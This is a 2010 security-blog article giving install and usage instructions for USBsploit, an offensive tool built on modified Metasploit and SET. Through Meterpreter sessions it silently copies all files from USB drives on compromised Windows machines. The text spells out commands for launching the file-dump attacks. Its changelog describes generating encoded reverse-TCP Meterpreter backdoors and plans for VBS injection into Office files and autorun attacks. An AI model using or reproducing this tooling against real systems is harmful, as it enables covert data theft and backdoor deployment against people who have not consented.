How to install USBsploit v0.1b through SVN, the tar.gz, the .run or to work with original Metasploit

Par Xavier Poli, secuobs.com
Le 14/07/2010

---

Résumé : USBsploit: PoC for dumping files from remote USB drives on multiple targets at the same time. It works through Meterpreter sessions with a light (24MB) modified version of Metasploit. The interface is a modified version of SET. usbsploit.rb can be used with the original Metasploit Framework. - Lire l'article



Reports the bugs to https://twitter.com/secuobs or xavier.poli@infratech.fr (recommanded for privacy issues), KeyID: 0x3A3D555A, FingerPrint: 04B1 244C CC25 DA93 EB73 EF52 E278 881F 3A3D 555A, xpo.asc

The usbsploit.rb script seems to have some issues if used with the default Ruby version of Backtrack 4, installing a 1.9.1 version will fixed. The details to give in the bugs reports: the version of Python, the version of Ruby, the version of Metasploit if used, the OS of the targets, the OS of the listener, the hardware details for both the targets and the listener but also for the USB drives, the security solutions installed on both the targets and the listener, the particular firewall configuration on both the target and the listener, the version of VMware or others if used, the last file for the Dump configuration, the stage where the bug was identified, the global USBsploit options if changed, the output of the high verbosity scan, the output of USBsploit

To use USBsploit, you certainly need the same dependencies ( link ) as the Metasploit Framework.

Installation through SVN ( lien )

root@xpo_secuobs:~# svn -q co https://svn.secuobs.com/svn
Erreur de validation du certificat du serveur pour 'https://svn.secuobs.com:443':
- Le certificat n'est pas signé pas une autorité de confiance.
Valider le certificat manuellement !
Informations du certificat :
- nom d'hôte : svn.secuobs.com
- valide de Fri, 09 Jul 2010 15:00:30 GMT à Mon, 06 Jul 2020 15:00:30 GMT
- signataire : XPO, SECUOBS, PARIS, IDF, FR
- empreinte : 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)ejet, acceptation (t)emporaire ou (p)ermanente ? p
root@xpo_secuobs:~# cd svn/
root@xpo_secuobs:~/svn# ./installer.sh
Type usbsploit to launch the USBsploit Framework
root@xpo_secuobs:~/svn# cd ../
root@xpo_secuobs:~# rm -fr svn
root@xpo_secuobs:~# usbsploit


Installation through usbsploit-0.1-beta-linux-i686.run ( lien )

root@xpo_secuobs:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.1-beta-linux-i686.run
root@xpo_secuobs:~# sha1sum usbsploit-0.1-beta-linux-i686.run
679ffe7c61608880ef8f8007393976cbedc18f22 usbsploit-0.1-beta-linux-i686.run
root@xpo_secuobs:~# sh usbsploit-0.1-beta-linux-i686.run
Type usbsploit to launch the USBsploit Framework
root@xpo_secuobs:~# rm -fr usbsploit
root@xpo_secuobs:~# usbsploit
The USBsploit Framework 0.1 BETA
Report bugs to: xavier.poli@infratech.fr
Homepage: http://www.secuobs.com
Based on modified versions of:
- Metasploit (original from HDM)
- SET (original from ReL1K)

It's the first launch, an update will be performend for the USBsploit Framework, be patient...
Erreur de validation du certificat du serveur pour 'https://svn.secuobs.com:443':
- Le certificat n'est pas signé pas une autorité de confiance.
Valider le certificat manuellement !
Informations du certificat :
- nom d'hôte : svn.secuobs.com
- valide de Fri, 09 Jul 2010 15:00:30 GMT à Mon, 06 Jul 2020 15:00:30 GMT

- signataire : XPO, SECUOBS, PARIS, IDF, FR
- empreinte : 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)ejet, acceptation (t)emporaire ou (p)ermanente ? p


Installation through usbsploit-0.1-beta-linux-i686.tar.gz ( lien )

root@xpo_secuobs:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.1-beta-linux-i686.tar.gz
root@xpo_secuobs:~# sha1sum usbsploit-0.1-beta-linux-i686.tar.gz
cf2d40e1236e266ac62e7d6140646cc3e050d5d2 usbsploit-0.1-beta-linux-i686.tar.gz
root@xpo_secuobs:~# tar zxvf usbsploit-0.1-beta-linux-i686.tar.gz
root@xpo_secuobs:~# cd usbsploit
root@xpo_secuobs:~/usbsploit# ./installer.sh
Type usbsploit to launch the USBsploit Framework
root@xpo_secuobs:~/usbsploit# cd ../
root@xpo_secuobs:~# rm -fr usbsploit/
root@xpo_secuobs:~# usbsploit
The USBsploit Framework 0.1 BETA
Report bugs to: xavier.poli@infratech.fr
Homepage: http://www.secuobs.com
Based on modified versions of:
- Metasploit (original from HDM)
- SET (original from ReL1K)

It's the first launch, an update will be performend for the USBsploit Framework, be patient...
Erreur de validation du certificat du serveur pour 'https://svn.secuobs.com:443':
- Le certificat n'est pas signé pas une autorité de confiance.
Valider le certificat manuellement !
Informations du certificat :
- nom d'hôte : svn.secuobs.com
- valide de Fri, 09 Jul 2010 15:00:30 GMT à Mon, 06 Jul 2020 15:00:30 GMT
- signataire : XPO, SECUOBS, PARIS, IDF, FR
- empreinte : 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)ejet, acceptation (t)emporaire ou (p)ermanente ? p


Installation usbsploit.rb working with the original Metasploit Framework ( lien )

root@xpo_secuobs:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.1-beta-linux-i686.tar.gz
root@xpo_secuobs:~# sha1sum usbsploit-0.1-beta-linux-i686.tar.gz
cf2d40e1236e266ac62e7d6140646cc3e050d5d2 usbsploit-0.1-beta-linux-i686.tar.gz
root@xpo_secuobs:~# tar zxvf usbsploit-0.1-beta-linux-i686.tar.gz
root@xpo_secuobs:~# mv usbsploit/lib/msf/scripts/meterpreter/usbsploit.rb /opt/metasploit3/msf3/scripts/meterpreter/
root@xpo_secuobs:~# mv usbsploit/lib/msf/data/textextensions /opt/metasploit3/msf3/data/
root@xpo_secuobs:~# rm -fr usbsploit/
root@xpo_secuobs:~# msfconsole

When you have a Meterpreter session :

- Get some help

meterpreter > run usbsploit -h

- Launch a Dump attack on all files with high verbosity and only during one successfull scan with dumped files

meterpreter > run usbsploit -v -w -d

- Launch a Dump attack only on files matching the predefined set of extensions with high verbosity and only during one successfull scan with dumped files

meterpreter > run usbsploit -v -w -e /opt/metasploit3/msf3/data/textextensions -t

- Launch a Dump attack on all files with high verbosity while an infinite loop

meterpreter > run usbsploit -v -d

- Launch a Dump attack only on files matching the predefined set of extensions with high verbosity while an infinite loop

meterpreter > run usbsploit -v -e /opt/metasploit3/msf3/data/textextensions -t

Just removed the "-v" switch to desactivate the high verbosity.

Edit the /opt/metasploit3/msf3/data/textextensions file to set the extensions to dump.

USBsploit ressources:

- Video: USBsploit gets all the remote USB files through Meterpreter and a modified MSF
- Video: USBsploit gets all the remote USB files by extensions through Meterpreter and a modified MSF
- Video: usbsploit.rb and the original MSF to get all the remote USB files through Meterpreter
- Video: usbploit.rb and the original MSF to get all the remote USB files by extensions through Meterpreter
- How to install USBsploit v0.1b through SVN, the tar.gz, the .run or to work with original Metasploit

Changelog:

V0.1b:

- USBsploit v0.1b was tested under a GNU/Linux operating system with Python 2.6.2 and ruby 1.9.1,
- USBsploit v0.1b was tested against a target Microsoft Windows XP PRO SP3 running under a GNU/Linux VMware Server 2.0.2,
- USBsploit v0.1b needs the wmic command on the targets (Windows XP home is not a possible target),
- USBsploit v0.1b works against multiple targets at the same time and multiple USB keys on each target
- USBsploit v0.1b deals the multiple plugs and unplugs for a same key
- USBsploit v0.1b can be installed via SVN, ".run" or ".tar.gz" archives,
- USBsploit v0.1b can be managed through a Python interface (a modified version of the Social Engineering Toolkit, original by ReL1K),
- USBsploit v0.1b can be updated via SVN,
- USBsploit v0.1b allows the activation and the desactivation for auto-updates,
- USBsploit v0.1b allows to edit global configuration file,
- USBsploit v0.1b allows to generate Meterpreter Backdoors with some available options (ip for the listener, type of Backdoor, type of Encoding, port for the Listener, multiple Encoding stages) and choose if a Dump Listener will be launched,
- USBsploit v0.1b allows to generate Meterpreter Backdoors with the same kind of options and launching automatically a Dump Listener,
- USBsploit v0.1b lets choosing between 3 types of Meterpreter Backdoors available (Reverse_TCP the only one tested for now, Reverse_TCP_X64, Egress Buster),
- USBsploit v0.1b lets choosing between 3 types of Encoding for the Meterpreter Backdoors (shikata_ga_nai, Multi-Encoder, Backdoored EGxecutable),
- USBsploit v0.1b allows to dump all the files from a remote USB key through multiple Meterpreter sessions and a light version (24MB) of Metasploit (original by HDM),
- USBsploit v0.1b allows to dumps, from a remote USB key, all the files matching a specific set of extensions, defined through a text file,
- USBsploit v0.1b allows to edit the file for defining the set of extensions,
- USBsploit v0.1b allows to launch a Dump Listerner through the last file of Dump configuration,
- USBsploit v0.1b allows to edit the last file of Dump configuration,
- USBsploit v0.1b allows to activate the high verbose mode,
- USBsploit v0.1b allows to hoose between only one USB Scan/Dump ending with success for each attack or an infinite loop,
- Ruby script usbsploit.rb compatible with the Metasploit Framework original (all the options work with the version 3.4.x, the anterior versions weren't tested).

Possible evolutions:

- The future versions of USBsploit could inject a malicious VBS script into the XLS files available on the remote USB keys, by uploading and executing the XLSinjector tool,
- The future versions of USBsploit could Upload and execute a modified version of USBDumper 0.2 to the targets. Injecting a malicious VBS script into XLS and DOC files available on the remote USB keys by this way,
- The future versions of USBsploit could launch an Autorun attack by uploading malicious files (autorun.inf, autorun.ico and usbsploitBackdoor.exe) on the remote USB keys,
- The future versions of USBsploit could target the USB U3 keys,
- The future versions of USBsploit could target the PDF files available on the remote USB keys with various attacks,
- The future versions of USBsploit could reintegrate the features of SET to spread the Backdoors,
- Others ???